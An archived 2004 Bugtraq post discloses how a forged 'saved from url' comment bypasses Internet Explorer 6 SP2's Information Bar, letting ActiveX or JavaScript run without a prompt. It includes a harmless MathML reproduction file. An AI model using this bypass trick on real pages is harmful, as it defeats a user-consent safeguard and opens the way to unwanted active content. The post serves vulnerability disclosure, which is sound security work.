Bugtraq mailing list archives
IE6 + XP SP2 Vulnerability
From: cns <cns () free fr>
Date: Thu, 16 Sep 2004 01:01:58 +0200
Background information ====================== Windows XP Service Pack 2 has introduced new features that improve browsing security in Internet Explorer. Most of them are additional messages that force the user to validate everything that is done by the browser. Most of these messages are displayed in the new Information Bar. For example if you try to open a web page that contains Javascript code or ActiveX objects, it is likely that they will be blocked, the Information Bar will appear and offer you to reload the page with the untrustworthy components enabled. More information can be found at: http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2brows.mspx The side effect of these features is that some web sites can't be used as easily as before because the user has to respond to an increasing number of notifications and questions. Vulnerability Explained ======================= As an example I created a simple XHTML document containing MathML and installed the MathPlayer ActiveX plugin from DesignScience (http://www.dessci.com/en). This type of document used to render correctly in IE6 but since SP2 was installed the new features interfere with the loading of the component : the page is first loaded without MathPlayer which has to be enabled via the Information Bar. But there seems to be a vulnerability in Internet Explorer that allows this protection to be bypassed. All that needs to be done is to add a fake comment between the DOCTYPE declaration and the <html> tag that mimics those added by IE when a page is saved to disk. The "fake" comments must be formatted as follows : <!-- saved from usr=(XXXX)URL --> where URL is to be replaced by an URL (for instance http://www.example.com/) and XXXX by a 4 digit integer that represents the number of characters in the URL (for instance 0023). System Affected =============== Windows XP Pro and Home editions with SP2 IE 6.0 (SP2) How to reproduce ================ Install the plugin from DesignScience. Paste the following text in a file with an .xml extension. Open it with IE with and without the comment on line 4. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 plus MathML 2.0//EN" "http://www.w3.org/TR/MathML2/dtd/xhtml-math11-f.dtd"> <!-- saved from url=(0023)http://www.example.com/ --> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>IE Vulnerability example</TITLE> <BODY> <math displaystyle="true" xmlns="&mathml;"> <mfrac> <mn>27</mn> <mn>12</mn> </mfrac> </math> </BODY></HTML> Remarks ======= This also works with pages containing Javascript code. -- Cyrille SZYMANSKI
Current thread:
- IE6 + XP SP2 Vulnerability cns (Sep 16)